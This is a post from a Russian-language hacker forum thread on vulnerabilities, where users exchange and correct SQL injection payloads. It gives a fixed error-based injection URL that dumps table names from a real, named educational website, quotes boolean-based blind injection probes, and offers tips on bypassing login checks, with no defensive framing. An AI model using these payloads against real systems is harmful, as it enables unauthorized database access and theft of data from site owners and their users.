Ваши вопросы по уязвимостям.

#11

25.10.2011, 23:45

Melfis

Постоянный

Регистрация: 25.04.2011

Сообщений: 505

С нами: 7921046

Репутация: 53

Цитата:

Сообщение от qaz

Народ, а чё я делоаю не правильно?
http://english.in.ua/study.php?id=7+or+1+group+by+concat%28%28select+ta ble_name+from+information_schema.tables%29,floor%2 8rand%280%29*2%29%29having+min%280%29+or+1--+
чего мне не показывает таблицы?

на самом то деле причина просто в

Цитата:

Сообщение от None

http://english.in.ua/study.php
?id=7+or+1+group+by+concat((select+table_name+from +information_schema.tables
limit 0,1
),floor%28rand(0)*2))having+min(0)+or+1--+

Цитата:

Сообщение от vaddd

site/news.php?id=18 and 1=1 (true)
site/news.php?id=6+AND+ascii(lower(substring(user(),1,1 )))=111 (true)
site/news.php?id=18 and 1=3 (false)
site/news.php?id=18 and 'a'='a'
в чем суть ошибки? mq вроде бы off

д а какая разница то? Юзай hex формат. А вообще можешь кинуть линк в пм, если просто интересно.

To, M1lten

Может банально идёт сверка $_REQUSET['login'] == $sql_resp['login']

$_REQUSET['login'] = sdf' sqlinj, а $sql_resp['login'] = выводимое тобою значение. Залогиниться возможно, когда идёт проверка на кол-во строк, которое вернулось после ввода. Может вообще два запроса на проверку логина и пароля, д дофига чего может быть и скуль не провести. Если ошибка от мускуля, то юзай error-based sqlinj